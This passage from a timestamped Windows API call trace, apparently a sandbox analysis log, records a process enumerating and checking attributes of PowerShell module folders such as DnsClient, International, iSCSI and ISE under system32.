	[0046.762] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.762] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c
	[0046.763] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d
	[0046.763] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7920
	[0046.802] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.802] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.802] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.805] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1")) returned 0x20
	[0046.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.807] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49
	[0046.807] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a
	[0046.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.812] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49
	[0046.812] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a
	[0046.812] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8580
	[0046.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.814] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49
	[0046.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.814] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.814] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49
	[0046.814] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a
	[0046.814] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7980
	[0046.816] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.816] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.816] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.816] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.822] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.822] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.822] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.823] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.823] FindNextFileW (in: hFindFile=0x1505fab7980, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.823] FindClose (in: hFindFile=0x1505fab7980 | out: hFindFile=0x1505fab7980) returned 1
	[0046.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.824] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20
	[0046.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.825] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40
	[0046.825] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41
	[0046.826] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7da0
	[0046.826] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.826] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.826] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.826] FindClose (in: hFindFile=0x1505fab7da0 | out: hFindFile=0x1505fab7da0) returned 1
	[0046.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.826] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40
	[0046.827] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41
	[0046.827] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8340
	[0046.827] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.827] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.827] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.827] FindClose (in: hFindFile=0x1505fab8340 | out: hFindFile=0x1505fab8340) returned 1
	[0046.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.827] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40
	[0046.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.828] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.828] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40
	[0046.828] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41
	[0046.828] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7860
	[0046.828] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.828] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.829] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.829] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.829] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20
	[0046.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.830] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38
	[0046.830] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39
	[0046.830] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8700
	[0046.830] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.830] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.830] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.831] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.831] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.831] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.831] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.831] FindClose (in: hFindFile=0x1505fab8700 | out: hFindFile=0x1505fab8700) returned 1
	[0046.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.832] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38
	[0046.832] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39
	[0046.832] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8220
	[0046.832] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.832] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.832] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.832] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.833] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.833] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.833] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.833] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0046.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.833] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38
	[0046.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.833] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.833] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38
	[0046.834] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39
	[0046.834] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7ec0
	[0046.834] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.834] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.834] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.834] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.835] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.835] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.835] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.835] FindClose (in: hFindFile=0x1505fab7ec0 | out: hFindFile=0x1505fab7ec0) returned 1
	[0046.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.835] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20
	[0046.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.836] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36
	[0046.836] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37
	[0046.836] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8820
	[0046.836] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.837] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.837] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.837] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.837] FindClose (in: hFindFile=0x1505fab8820 | out: hFindFile=0x1505fab8820) returned 1
	[0046.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.837] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36
	[0046.837] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37
	[0046.837] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7f20
	[0046.838] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.838] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.838] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.838] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.838] FindClose (in: hFindFile=0x1505fab7f20 | out: hFindFile=0x1505fab7f20) returned 1
	[0046.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.838] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36
	[0046.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.838] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.839] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36
